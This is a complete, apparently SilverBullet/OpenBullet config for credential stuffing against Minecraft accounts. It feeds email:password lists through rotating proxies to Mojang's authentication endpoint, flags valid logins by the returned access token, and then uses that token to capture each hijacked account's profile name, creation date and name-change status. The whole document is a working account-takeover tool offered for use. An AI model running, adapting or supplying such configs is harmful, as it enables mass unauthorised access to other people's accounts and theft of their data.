[SETTINGS]
{
  "Name": "Minecraft {Windows + Web Api}",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2021-07-01T09:26:54.0676376+05:30",
  "AdditionalInfo": "Config made by @JustDaixD",
  "RequiredPlugins": [],
  "Author": "Just Dai xD",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Minecraft {Windows Api}",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://authserver.mojang.com/authenticate" 
  CONTENT "{\"agent\": {\"name\": \"Minecraft\",\"version\": 1},\"username\": \"<USER>\",\"password\": \"<PASS>\",\"requestUser\": \"true\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: authserver.mojang.com" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "nvalid credentials. Invalid username or password." 
  KEYCHAIN Success OR 
    KEY "\"accessToken\":\"" 

#accessToken PARSE "<SOURCE>" JSON "accessToken" -> VAR "accessToken" 

REQUEST GET "https://api.minecraftservices.com/minecraft/profile" 
  
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Authorization: Bearer <accessToken>" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: api.minecraftservices.com" 
  HEADER "Origin: https://www.minecraft.net" 
  HEADER "Referer: https://www.minecraft.net/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Microsoft Edge\";v=\"91\", \"Chromium\";v=\"91\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59" 

#Name PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "Name" 

#state PARSE "<SOURCE>" JSON "state" CreateEmpty=FALSE -> CAP "state" 

#variant PARSE "<SOURCE>" JSON "variant" CreateEmpty=FALSE -> CAP "Variant" 

REQUEST GET "https://api.minecraftservices.com/minecraft/profile/namechange" 
  
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Authorization: Bearer <accessToken>" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: api.minecraftservices.com" 
  HEADER "Origin: https://www.minecraft.net" 
  HEADER "Referer: https://www.minecraft.net/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Microsoft Edge\";v=\"91\", \"Chromium\";v=\"91\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59" 

#Account_created_at PARSE "<SOURCE>" JSON "createdAt" CreateEmpty=FALSE -> CAP "Account created at" 

#nameChangeAllowed PARSE "<SOURCE>" JSON "nameChangeAllowed" CreateEmpty=FALSE -> CAP "Name Change Allowed" 

FUNCTION Constant "@JustDaixD" -> CAP "Config made by" 

